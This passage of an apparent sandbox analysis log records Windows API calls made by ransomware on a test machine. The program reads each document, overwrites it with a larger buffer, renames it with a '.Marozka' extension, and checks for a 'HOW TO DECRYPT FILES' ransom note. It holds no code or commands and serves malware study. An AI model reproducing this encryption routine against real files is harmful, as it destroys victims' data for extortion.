lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0049.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0049.288] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0049.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0049.288] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx", lpFilePart=0x0) returned 0x2a [0049.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0049.288] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\esp8vtxy4co.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.289] GetFileType (hFile=0x2e0) returned 0x1 [0049.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0049.289] GetFileType (hFile=0x2e0) returned 0x1 [0049.290] WriteFile (in: hFile=0x2e0, lpBuffer=0x27762ac*, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27762ac*, lpNumberOfBytesWritten=0x5beab0*=0x4a00, lpOverlapped=0x0) returned 1 [0049.291] CloseHandle (hObject=0x2e0) returned 1 [0049.295] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx", lpFilePart=0x0) returned 0x2a [0049.295] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx.Marozka", lpFilePart=0x0) returned 0x32 [0049.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0049.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\esp8vtxy4co.pptx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c69640, ftCreationTime.dwHighDateTime=0x1d48c2d, ftLastAccessTime.dwLowDateTime=0x4229e620, ftLastAccessTime.dwHighDateTime=0x1d4c263, ftLastWriteTime.dwLowDateTime=0xe01dec19, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x4a00)) returned 1 [0049.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0049.296] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\esp8vtxy4co.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\esp8vtxy4co.pptx.marozka")) returned 1 [0049.297] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf", lpFilePart=0x0) returned 0x2d [0049.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0049.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\frxdopctzionrlz.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.297] GetFileType (hFile=0x2e0) returned 0x1 [0049.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0049.297] GetFileType (hFile=0x2e0) returned 0x1 [0049.297] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x17b26 [0049.298] ReadFile (in: hFile=0x2e0, lpBuffer=0x37e9e98, nNumberOfBytesToRead=0x17b26, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x37e9e98*, lpNumberOfBytesRead=0x5beabc*=0x17b26, lpOverlapped=0x0) returned 1 [0049.300] CloseHandle (hObject=0x2e0) returned 1 [0049.377] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0049.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0049.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0049.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0049.377] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf", lpFilePart=0x0) returned 0x2d [0049.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0049.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\frxdopctzionrlz.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.379] GetFileType (hFile=0x2e0) returned 0x1 [0049.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0049.379] GetFileType (hFile=0x2e0) returned 0x1 [0049.380] WriteFile (in: hFile=0x2e0, lpBuffer=0x38606c0*, nNumberOfBytesToWrite=0x17b30, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x38606c0*, lpNumberOfBytesWritten=0x5beab0*=0x17b30, lpOverlapped=0x0) returned 1 [0049.382] CloseHandle (hObject=0x2e0) returned 1 [0049.387] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf", lpFilePart=0x0) returned 0x2d [0049.387] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf.Marozka", lpFilePart=0x0) returned 0x35 [0049.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0049.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\frxdopctzionrlz.pdf"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8992c1f0, ftCreationTime.dwHighDateTime=0x1d4d2bf, ftLastAccessTime.dwLowDateTime=0xf4856230, ftLastAccessTime.dwHighDateTime=0x1d4c598, ftLastWriteTime.dwLowDateTime=0xe02a0b6b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x17b30)) returned 1 [0049.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0049.388] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\frxdopctzionrlz.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\FRxDopCtZiONRLZ.pdf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\frxdopctzionrlz.pdf.marozka")) returned 1 [0049.390] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx", lpFilePart=0x0) returned 0x24 [0049.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0049.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\gog6i.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.390] GetFileType (hFile=0x2e0) returned 0x1 [0049.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0049.390] GetFileType (hFile=0x2e0) returned 0x1 [0049.390] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1444b [0049.390] ReadFile (in: hFile=0x2e0, lpBuffer=0x27c8438, nNumberOfBytesToRead=0x1444b, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27c8438*, lpNumberOfBytesRead=0x5beabc*=0x1444b, lpOverlapped=0x0) returned 1 [0049.392] CloseHandle (hObject=0x2e0) returned 1 [0049.469] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0049.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0049.470] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0049.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0049.470] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx", lpFilePart=0x0) returned 0x24 [0049.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0049.470] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\gog6i.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.472] GetFileType (hFile=0x2e0) returned 0x1 [0049.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0049.472] GetFileType (hFile=0x2e0) returned 0x1 [0049.472] WriteFile (in: hFile=0x2e0, lpBuffer=0x2851f28*, nNumberOfBytesToWrite=0x14450, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2851f28*, lpNumberOfBytesWritten=0x5beab0*=0x14450, lpOverlapped=0x0) returned 1 [0049.474] CloseHandle (hObject=0x2e0) returned 1 [0049.916] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx", lpFilePart=0x0) returned 0x24 [0049.916] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx.Marozka", lpFilePart=0x0) returned 0x2c [0049.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0049.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\gog6i.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ddfd630, ftCreationTime.dwHighDateTime=0x1d4e269, ftLastAccessTime.dwLowDateTime=0x37f49b60, ftLastAccessTime.dwHighDateTime=0x1d4995e, ftLastWriteTime.dwLowDateTime=0xe07ae6dc, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x14450)) returned 1 [0049.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0049.916] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\gog6i.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\gOG6I.xlsx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\gog6i.xlsx.marozka")) returned 1 [0049.917] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx", lpFilePart=0x0) returned 0x26 [0049.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0049.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hcwjryt.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.917] GetFileType (hFile=0x2e0) returned 0x1 [0049.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0049.917] GetFileType (hFile=0x2e0) returned 0x1 [0049.917] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xc4b7 [0049.917] ReadFile (in: hFile=0x2e0, lpBuffer=0x28667f4, nNumberOfBytesToRead=0xc4b7, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x28667f4*, lpNumberOfBytesRead=0x5beabc*=0xc4b7, lpOverlapped=0x0) returned 1 [0049.918] CloseHandle (hObject=0x2e0) returned 1 [0050.103] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.104] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.104] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx", lpFilePart=0x0) returned 0x26 [0050.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.104] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hcwjryt.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.105] GetFileType (hFile=0x2e0) returned 0x1 [0050.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.105] GetFileType (hFile=0x2e0) returned 0x1 [0050.105] WriteFile (in: hFile=0x2e0, lpBuffer=0x26e2314*, nNumberOfBytesToWrite=0xc4c0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26e2314*, lpNumberOfBytesWritten=0x5beab0*=0xc4c0, lpOverlapped=0x0) returned 1 [0050.107] CloseHandle (hObject=0x2e0) returned 1 [0050.114] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx", lpFilePart=0x0) returned 0x26 [0050.114] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx.Marozka", lpFilePart=0x0) returned 0x2e [0050.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hcwjryt.docx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3721e1b0, ftCreationTime.dwHighDateTime=0x1d4858c, ftLastAccessTime.dwLowDateTime=0x1b95ebb0, ftLastAccessTime.dwHighDateTime=0x1d483e0, ftLastWriteTime.dwLowDateTime=0xe099e500, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc4c0)) returned 1 [0050.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.114] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hcwjryt.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\HCwJryT.docx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\hcwjryt.docx.marozka")) returned 1 [0050.115] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx", lpFilePart=0x0) returned 0x2b [0050.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.115] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ltxve5xrrdbk.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.115] GetFileType (hFile=0x2e0) returned 0x1 [0050.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.115] GetFileType (hFile=0x2e0) returned 0x1 [0050.115] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x15338 [0050.116] ReadFile (in: hFile=0x2e0, lpBuffer=0x38b9430, nNumberOfBytesToRead=0x15338, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x38b9430*, lpNumberOfBytesRead=0x5beabc*=0x15338, lpOverlapped=0x0) returned 1 [0050.117] CloseHandle (hObject=0x2e0) returned 1 [0050.189] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.189] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx", lpFilePart=0x0) returned 0x2b [0050.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ltxve5xrrdbk.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.191] GetFileType (hFile=0x2e0) returned 0x1 [0050.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.191] GetFileType (hFile=0x2e0) returned 0x1 [0050.191] WriteFile (in: hFile=0x2e0, lpBuffer=0x39234a8*, nNumberOfBytesToWrite=0x15340, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x39234a8*, lpNumberOfBytesWritten=0x5beab0*=0x15340, lpOverlapped=0x0) returned 1 [0050.193] CloseHandle (hObject=0x2e0) returned 1 [0050.195] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx", lpFilePart=0x0) returned 0x2b [0050.195] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx.Marozka", lpFilePart=0x0) returned 0x33 [0050.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.195] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ltxve5xrrdbk.pptx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d6ac370, ftCreationTime.dwHighDateTime=0x1d4625a, ftLastAccessTime.dwLowDateTime=0xa286c810, ftLastAccessTime.dwHighDateTime=0x1d4bb8a, ftLastWriteTime.dwLowDateTime=0xe0a5d150, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15340)) returned 1 [0050.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.195] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ltxve5xrrdbk.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\ltXvE5XrRDBK.pptx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\ltxve5xrrdbk.pptx.marozka")) returned 1 [0050.196] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx", lpFilePart=0x0) returned 0x33 [0050.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mn1d4ziy0_mayquuua_a.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.196] GetFileType (hFile=0x2e0) returned 0x1 [0050.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.196] GetFileType (hFile=0x2e0) returned 0x1 [0050.196] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xf831 [0050.196] ReadFile (in: hFile=0x2e0, 